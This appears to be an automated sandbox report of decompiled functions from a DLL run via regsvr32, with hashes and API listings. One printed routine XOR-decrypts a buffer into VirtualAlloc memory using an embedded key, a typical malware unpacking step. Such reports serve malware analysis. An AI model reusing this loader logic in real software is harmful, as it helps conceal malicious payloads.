                                                                                                        • Instruction ID: 928ee41ef14e52c545a8780ea4b798472554b11224a021a691b9c5ec491e0c42
                                                                                                        • Opcode Fuzzy Hash: d6a9ae3060159eb32e1333261476f0ce7afd758758ec1d3e09a9f36619dac840
                                                                                                        • Instruction Fuzzy Hash: 2321C16E91CE9A81DA10EB52E4512AEA364FBC47E0FC04075FACE4775ACEBCD451C750
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 79%
                                                                                                        			E00007FFC7FFC123D13A0(signed int __eax, long long __rcx, signed int __rdx, signed long long __r8, long long _a8, signed int _a16, signed long long _a24) {
                                                                                                        				void* _v16;
                                                                                                        				signed long long _v24;
                                                                                                        				long long _v32;
                                                                                                        				signed int _v40;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if (_a16 - 0xffffffff <= 0) goto 0x123d13cd;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_v24 = _a16 * _a24;
                                                                                                        				if (_v24 - 0x1000 < 0) goto 0x123d1475;
                                                                                                        				_v40 = _a8;
                                                                                                        				if ((_v40 & 0x0000001f) == 0) goto 0x123d1409;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_v16 = _v40 - 8;
                                                                                                        				_v32 =  *_v16;
                                                                                                        				if (_v32 - _v40 < 0) goto 0x123d1435;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				if (_v40 - _v32 - 8 >= 0) goto 0x123d1450;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				if (_v40 - _v32 - 0x27 <= 0) goto 0x123d146b;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_a8 = _v32;
                                                                                                        				0x123d4184(); // executed
                                                                                                        				return __eax / _a24;
                                                                                                        			}







                                                                                                        0x7ffc123d13a0
                                                                                                        0x7ffc123d13a5
                                                                                                        0x7ffc123d13aa
                                                                                                        0x7ffc123d13c6
                                                                                                        0x7ffc123d13c8
                                                                                                        0x7ffc123d13d8
                                                                                                        0x7ffc123d13e6
                                                                                                        0x7ffc123d13f1
                                                                                                        0x7ffc123d1402
                                                                                                        0x7ffc123d1404
                                                                                                        0x7ffc123d1412
                                                                                                        0x7ffc123d141f
                                                                                                        0x7ffc123d142e
                                                                                                        0x7ffc123d1430
                                                                                                        0x7ffc123d1449
                                                                                                        0x7ffc123d144b
                                                                                                        0x7ffc123d1464
                                                                                                        0x7ffc123d1466
                                                                                                        0x7ffc123d1470
                                                                                                        0x7ffc123d147a
                                                                                                        0x7ffc123d1483

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                        • String ID:
                                                                                                        • API String ID: 3668304517-0
                                                                                                        • Opcode ID: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction ID: 949f50f39320ec8dfefb73e801cb902641b7baae4f3b2d435ca7511ef7ae919b
                                                                                                        • Opcode Fuzzy Hash: 5b3810bd1dfc2f7cb2c35ba7318fdc2941c7d859428b9d04d3661772caa0df3a
                                                                                                        • Instruction Fuzzy Hash: 4D213E2A618F9C81DA50DB59E08025EA3A9F7C87B4F800635FADD03BA8DF7CD160CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123E9510(intOrPtr __edx, long long __rcx, void* __rdx, long long _a8, intOrPtr _a16) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				signed int _v36;
                                                                                                        				intOrPtr _v40;
                                                                                                        				signed int _t35;
                                                                                                        				signed int _t48;
                                                                                                        				long long _t63;
                                                                                                        				intOrPtr _t64;
                                                                                                        				void* _t66;
                                                                                                        				void* _t76;
                                                                                                        				void* _t77;
                                                                                                        
                                                                                                        				_a16 = __edx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v24 = 0;
                                                                                                        				_t63 = "*sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5";
                                                                                                        				_v16 = _t63;
                                                                                                        				_v32 = E00007FFC7FFC123D91B8(_t63, _t66, L"64", _t76, _t77);
                                                                                                        				_v36 = E00007FFC7FFC123D91B8(_t63, _t66, L"4096", _t76, _t77);
                                                                                                        				_t35 = E00007FFC7FFC123D91B8(_t63, _t66, L"8192", _t76, _t77);
                                                                                                        				r9d = _v32;
                                                                                                        				r8d = _v36 | _t35;
                                                                                                        				VirtualAlloc(??, ??, ??, ??); // executed
                                                                                                        				_v24 = _t63;
                                                                                                        				if (_v24 != 0) goto 0x123e958f;
                                                                                                        				goto 0x123e95f4;
                                                                                                        				_v40 = 0;
                                                                                                        				goto 0x123e95a3;
                                                                                                        				_v40 = _v40 + 1;
                                                                                                        				if (_v40 - _a16 >= 0) goto 0x123e95ef;
                                                                                                        				_t64 = _v40;
                                                                                                        				_v28 =  *(_a8 + _t64) & 0x000000ff;
                                                                                                        				asm("cdq");
                                                                                                        				_t48 = _v28 ^  *(_v16 + _t64) & 0x000000ff;
                                                                                                        				 *(_v24 + _v40) = _t48;
                                                                                                        				goto 0x123e9599;
                                                                                                        				return _t48;
                                                                                                        			}
















                                                                                                        0x7ffc123e9510
                                                                                                        0x7ffc123e9514
                                                                                                        0x7ffc123e951d
                                                                                                        0x7ffc123e9526
                                                                                                        0x7ffc123e952d
                                                                                                        0x7ffc123e953e
                                                                                                        0x7ffc123e954e
                                                                                                        0x7ffc123e9559
                                                                                                        0x7ffc123e956e
                                                                                                        0x7ffc123e9571
                                                                                                        0x7ffc123e9578
                                                                                                        0x7ffc123e957e
                                                                                                        0x7ffc123e9589
                                                                                                        0x7ffc123e958d
                                                                                                        0x7ffc123e958f
                                                                                                        0x7ffc123e9597
                                                                                                        0x7ffc123e959f
                                                                                                        0x7ffc123e95ab
                                                                                                        0x7ffc123e95ad
                                                                                                        0x7ffc123e95bb
                                                                                                        0x7ffc123e95c3
                                                                                                        0x7ffc123e95de
                                                                                                        0x7ffc123e95ea
                                                                                                        0x7ffc123e95ed
                                                                                                        0x7ffc123e95f8

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: AllocVirtual
                                                                                                        • String ID: *sd<^MngnRgHP%Nlnz#_&tGXftD&<%Z?YkmM&U?jm?po)5$4096$8192
                                                                                                        • API String ID: 4275171209-3063897839
                                                                                                        • Opcode ID: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction ID: 272171558c79a68e5d6df2fca63cf0f748b0107e2b5b9a39c9453a83e8570ed9
                                                                                                        • Opcode Fuzzy Hash: 91190bfb5b736a4e483a359375091e0b2d421b3ba45f9d7b7fc30dabc440354d
                                                                                                        • Instruction Fuzzy Hash: 3B213A7661CA958AD760CB14E4802AAB7A1F7C8354F800276F68EC3B94DF7CD555CF14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E00007FFC7FFC123D12B0(signed int __eax, signed int __rcx, signed int __rdx, signed int _a8, signed int _a16, signed char _a24) {
                                                                                                        				long long _v16;
                                                                                                        				long long _v24;
                                                                                                        				signed long long _v32;
                                                                                                        				signed long long _v40;
                                                                                                        				void* _t40;
                                                                                                        				long long _t54;
                                                                                                        				signed long long _t57;
                                                                                                        				signed long long _t58;
                                                                                                        				void* _t60;
                                                                                                        
                                                                                                        				_a24 = r8b;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v40 = 0;
                                                                                                        				if (_a8 != 0) goto 0x123d12de;
                                                                                                        				goto 0x123d1397;
                                                                                                        				_t42 = __eax % _a16;
                                                                                                        				if (0xffffffff - _a8 >= 0) goto 0x123d12f8;
                                                                                                        				E00007FFC7FFC123D4E7C(__eax % _a16, 0xffffffff - _a8, 0xffffffff, _t60);
                                                                                                        				_v32 = _a8 * _a16;
                                                                                                        				if ((_a24 & 0x000000ff) == 0) goto 0x123d137c;
                                                                                                        				if (_v32 - 0x1000 < 0) goto 0x123d137c;
                                                                                                        				_v24 = _v32 + 0x27;
                                                                                                        				_t54 = _v32;
                                                                                                        				if (_v24 - _t54 > 0) goto 0x123d133b;
                                                                                                        				E00007FFC7FFC123D4E7C(_t42, _v24 - _t54, _t54, _t60);
                                                                                                        				E00007FFC7FFC123D3D6C(_t54, _v24); // executed
                                                                                                        				_v16 = _t54;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				_t57 = _v16 + 0x00000027 & 0xffffffe0;
                                                                                                        				_v40 = _t57;
                                                                                                        				_t58 = _t57 * 0xffffffff;
                                                                                                        				 *((long long*)(_v40 + _t58)) = _v16;
                                                                                                        				goto 0x123d1392;
                                                                                                        				_t40 = E00007FFC7FFC123D3D6C(_t58, _v32);
                                                                                                        				_v40 = _t58;
                                                                                                        				E00007FFC7FFC123D9764();
                                                                                                        				return _t40;
                                                                                                        			}












                                                                                                        0x7ffc123d12b0
                                                                                                        0x7ffc123d12b5
                                                                                                        0x7ffc123d12ba
                                                                                                        0x7ffc123d12c3
                                                                                                        0x7ffc123d12d2
                                                                                                        0x7ffc123d12d9
                                                                                                        0x7ffc123d12e7
                                                                                                        0x7ffc123d12f1
                                                                                                        0x7ffc123d12f3
                                                                                                        0x7ffc123d1303
                                                                                                        0x7ffc123d130f
                                                                                                        0x7ffc123d131a
                                                                                                        0x7ffc123d1325
                                                                                                        0x7ffc123d132a
                                                                                                        0x7ffc123d1334
                                                                                                        0x7ffc123d1336
                                                                                                        0x7ffc123d1340
                                                                                                        0x7ffc123d1345
                                                                                                        0x7ffc123d134c
                                                                                                        0x7ffc123d135a
                                                                                                        0x7ffc123d135e
                                                                                                        0x7ffc123d1368
                                                                                                        0x7ffc123d1376
                                                                                                        0x7ffc123d137a
                                                                                                        0x7ffc123d1381
                                                                                                        0x7ffc123d1386
                                                                                                        0x7ffc123d138d
                                                                                                        0x7ffc123d139b

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::cancel_current_task
                                                                                                        • String ID:
                                                                                                        • API String ID: 118556049-0
                                                                                                        • Opcode ID: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction ID: 74a20b67814841f727859cb6c298a01d3d2031257462e3da200aa412100d88c0
                                                                                                        • Opcode Fuzzy Hash: ff720ffcf4aede3f10a3f13f5346b42280883c8723ff7dc07c368008fd0d958a
                                                                                                        • Instruction Fuzzy Hash: 7521FF2A51CF9982DB609B19E04036AB7A4FBC87B4F800361F6DD46BE8CF6CD560CB14
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00007FFC7FFC123D2970(void* __edx, void* __eflags, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed int _v16;
                                                                                                        				char _v48;
                                                                                                        				long long _v56;
                                                                                                        				signed long long _v64;
                                                                                                        				signed int _v72;
                                                                                                        				void* _t35;
                                                                                                        				void* _t37;
                                                                                                        				signed long long _t39;
                                                                                                        				signed long long _t40;
                                                                                                        				signed long long _t61;
                                                                                                        
                                                                                                        				_t37 = __eflags;
                                                                                                        				_t36 = __edx;
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				_v56 = 0xfffffffe;
                                                                                                        				_t39 =  *0x1244e008; // 0x2d0c2734ea27
                                                                                                        				_t40 = _t39 ^ _t61;
                                                                                                        				_v16 = _t40;
                                                                                                        				_v72 = 0;
                                                                                                        				E00007FFC7FFC123D1760(__edx,  &_v48);
                                                                                                        				E00007FFC7FFC123D1490(_t40, _a16);
                                                                                                        				_v64 = _t40;
                                                                                                        				E00007FFC7FFC123D11A0(_a24);
                                                                                                        				E00007FFC7FFC123D2CC0(__edx, _t37, _v64 + _t40,  &_v48, _v64 + _t40, __r8); // executed
                                                                                                        				E00007FFC7FFC123D2E90( &_v48, _a16);
                                                                                                        				E00007FFC7FFC123D2E60( &_v48, _a24);
                                                                                                        				E00007FFC7FFC123D16A0(__edx, _v64 + _t40, _a8,  &_v48);
                                                                                                        				_v72 = _v72 | 0x00000001;
                                                                                                        				return E00007FFC7FFC123D3A70(E00007FFC7FFC123D1540( &_v48), _t35, _t36, _v16 ^ _t61);
                                                                                                        			}













                                                                                                        0x7ffc123d2970
                                                                                                        0x7ffc123d2970
                                                                                                        0x7ffc123d2970
                                                                                                        0x7ffc123d2975
                                                                                                        0x7ffc123d297a
                                                                                                        0x7ffc123d2983
                                                                                                        0x7ffc123d298c
                                                                                                        0x7ffc123d2993
                                                                                                        0x7ffc123d2996
                                                                                                        0x7ffc123d299b
                                                                                                        0x7ffc123d29a8
                                                                                                        0x7ffc123d29b3
                                                                                                        0x7ffc123d29b8
                                                                                                        0x7ffc123d29c5
                                                                                                        0x7ffc123d29dd
                                                                                                        0x7ffc123d29ec
                                                                                                        0x7ffc123d29fe
                                                                                                        0x7ffc123d2a0d
                                                                                                        0x7ffc123d2a19
                                                                                                        0x7ffc123d2a3d

                                                                                                        APIs
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D29C5
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D29EC
                                                                                                        • type_info::_name_internal_method.LIBCMTD ref: 00007FFC123D29FE
                                                                                                          • Part of subcall function 00007FFC123D16A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D16BC
                                                                                                          • Part of subcall function 00007FFC123D1540: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D1567
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::EmptyQueue::StructuredWorktype_info::_name_internal_method$char_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 652137993-0
                                                                                                        • Opcode ID: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
                                                                                                        • Instruction ID: e96ff5e436626020c638874bd44ed743403ee6727d2f343cde93ab7ac90d732b
                                                                                                        • Opcode Fuzzy Hash: 110c28662a49dc0ce0b420f88bf91af1763c08d6580e3a8db95f45a47403bc2f
                                                                                                        • Instruction Fuzzy Hash: A9115E6A61CA8982DA50DB24E4911ABB764FBC47E4FC01231F6CE43AAADF7CD151CF10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 45%
                                                                                                        			E00007FFC7FFC123D1B40(void* __rax, long long __rcx, long long __rdx, long long __r8, long long _a8, long long _a16, long long _a24) {
                                                                                                        				signed char _t23;
                                                                                                        
                                                                                                        				_a24 = __r8;
                                                                                                        				_a16 = __rdx;
                                                                                                        				_a8 = __rcx;
                                                                                                        				if ((E00007FFC7FFC123D2250(__rax, _a8, _a16) & 0x000000ff) == 0) goto 0x123d1b97;
                                                                                                        				E00007FFC7FFC123D18F0(__rax, _a8);
                                                                                                        				E00007FFC7FFC123D1BF0(_a16 - __rax, _a8, _a8, _a16 - __rax, _a24);
                                                                                                        				goto 0x123d1be0;
                                                                                                        				r8d = 0;
                                                                                                        				_t23 = E00007FFC7FFC123D22B0(_t31, _a8, _a24); // executed
                                                                                                        				if ((_t23 & 0x000000ff) == 0) goto 0x123d1bdb;
                                                                                                        				E00007FFC7FFC123D18F0(_t31, _a8);
                                                                                                        				E00007FFC7FFC123D11E0(_t31, _a16, _a24);
                                                                                                        				return E00007FFC7FFC123D23A0(_t31, _a8, _a24);
                                                                                                        			}




                                                                                                        0x7ffc123d1b40
                                                                                                        0x7ffc123d1b45
                                                                                                        0x7ffc123d1b4a
                                                                                                        0x7ffc123d1b67
                                                                                                        0x7ffc123d1b6e
                                                                                                        0x7ffc123d1b90
                                                                                                        0x7ffc123d1b95
                                                                                                        0x7ffc123d1b97
                                                                                                        0x7ffc123d1ba4
                                                                                                        0x7ffc123d1bae
                                                                                                        0x7ffc123d1bb5
                                                                                                        0x7ffc123d1bc7
                                                                                                        0x7ffc123d1be4

                                                                                                        APIs
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D226B
                                                                                                          • Part of subcall function 00007FFC123D2250: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D227C
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1B6E
                                                                                                          • Part of subcall function 00007FFC123D18F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFC123D18FE
                                                                                                        • Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFC123D1BB5
                                                                                                        • char_traits.LIBCPMTD ref: 00007FFC123D1BC7
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Concurrency::details::Work$Base::ContextIdentityQueue$EmptyQueue::Structuredchar_traits
                                                                                                        • String ID:
                                                                                                        • API String ID: 872432861-0
                                                                                                        • Opcode ID: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction ID: 622b59f6c55f9b0bee359dd026c7915c4f9324870f03438eea11653154ea61e2
                                                                                                        • Opcode Fuzzy Hash: 231cebcbe718267e9fff52c18f272d48930a3c5afa83f06dd49d2f29f991d26b
                                                                                                        • Instruction Fuzzy Hash: BE111F6A63CE9982DA40DB56E4914AB6364FBC5BD0F801072FECE47B5ACE6CD410CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E00007FFC7FFC123D3F18(void* __ecx) {
                                                                                                        				void* __rbx;
                                                                                                        				void* _t12;
                                                                                                        				void* _t17;
                                                                                                        				void* _t18;
                                                                                                        				void* _t19;
                                                                                                        				void* _t20;
                                                                                                        
                                                                                                        				_t2 =  ==  ? 1 :  *0x1244f1a0 & 0x000000ff;
                                                                                                        				 *0x1244f1a0 =  ==  ? 1 :  *0x1244f1a0 & 0x000000ff;
                                                                                                        				E00007FFC7FFC123D4760(1, _t12, _t17, _t18, _t19, _t20);
                                                                                                        				if (E00007FFC7FFC123D6AC0() != 0) goto 0x123d3f47;
                                                                                                        				goto 0x123d3f5b; // executed
                                                                                                        				E00007FFC7FFC123DA844(_t17); // executed
                                                                                                        				if (0 != 0) goto 0x123d3f59;
                                                                                                        				E00007FFC7FFC123D6B1C(0);
                                                                                                        				goto 0x123d3f43;
                                                                                                        				return 1;
                                                                                                        			}









                                                                                                        0x7ffc123d3f2c
                                                                                                        0x7ffc123d3f2f
                                                                                                        0x7ffc123d3f35
                                                                                                        0x7ffc123d3f41
                                                                                                        0x7ffc123d3f45
                                                                                                        0x7ffc123d3f47
                                                                                                        0x7ffc123d3f4e
                                                                                                        0x7ffc123d3f52
                                                                                                        0x7ffc123d3f57
                                                                                                        0x7ffc123d3f60

                                                                                                        APIs
                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFC123D3F35
                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFC123D3F3A
                                                                                                          • Part of subcall function 00007FFC123D6AC0: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFC123D6AC4
                                                                                                          • Part of subcall function 00007FFC123D6AC0: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFC123D6AC9
                                                                                                          • Part of subcall function 00007FFC123D6AC0: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFC123D6ACE
                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFC123D3F52
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                        • String ID:
                                                                                                        • API String ID: 3388242289-0
                                                                                                        • Opcode ID: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction ID: 64bd7b5ca72c1601f689782115ecfd7347c96a86e058eea154de9df51e528277
                                                                                                        • Opcode Fuzzy Hash: 5d9032b98b00912ce65cde94096c8696e72d1c768cb864a179bbf2be0d6f6683
                                                                                                        • Instruction Fuzzy Hash: 6EE0125CD0CABE45FD55277164522F5166C0F96320FC500F9D8AE421C38ECD6879E971
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 37%
                                                                                                        			E00007FFC7FFC123E3F70() {
                                                                                                        				long long _v24;
                                                                                                        				long long _t5;
                                                                                                        				intOrPtr _t7;
                                                                                                        
                                                                                                        				_v24 = 0;
                                                                                                        				_t7 =  *0x1244fdd8; // 0x180000000
                                                                                                        				E00007FFC7FFC123E9600(_t5, "fx", _t7, "DllRegisterServer");
                                                                                                        				_v24 = _t5;
                                                                                                        				ExitProcess(??);
                                                                                                        			}






                                                                                                        0x7ffc123e3f74
                                                                                                        0x7ffc123e3f84
                                                                                                        0x7ffc123e3f92
                                                                                                        0x7ffc123e3f97
                                                                                                        0x7ffc123e3f9c

                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.276563362.00007FFC123D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFC123D0000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.276549986.00007FFC123D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276764696.00007FFC12408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276799788.00007FFC1244E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276807230.00007FFC12452000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276813314.00007FFC12455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.276819668.00007FFC12457000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_7ffc123d0000_regsvr32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ExitProcess
                                                                                                        • String ID: DllRegisterServer
                                                                                                        • API String ID: 621844428-1663957109
                                                                                                        • Opcode ID: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction ID: 921249c73899c4e873628d103e58540835e408b3e80be9276daeb0602dbc833a
                                                                                                        • Opcode Fuzzy Hash: daa4509797ac003af5991cc102a2f8bbc2bd6225bef9e83475646ccea547d58a
                                                                                                        • Instruction Fuzzy Hash: 75D05EB8908E9682EA209F10F8453DA33A0FB89328FC00131D58C42264DFBCE239CB64
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 68%
                                                                                                        			E00007FFC7FFC123DA9DC(intOrPtr* __rax, void* __rcx) {
                                                                                                        				int _t1;
                                                                                                        				intOrPtr _t3;
                                                                                                        				void* _t4;
                                                                                                        				void* _t11;
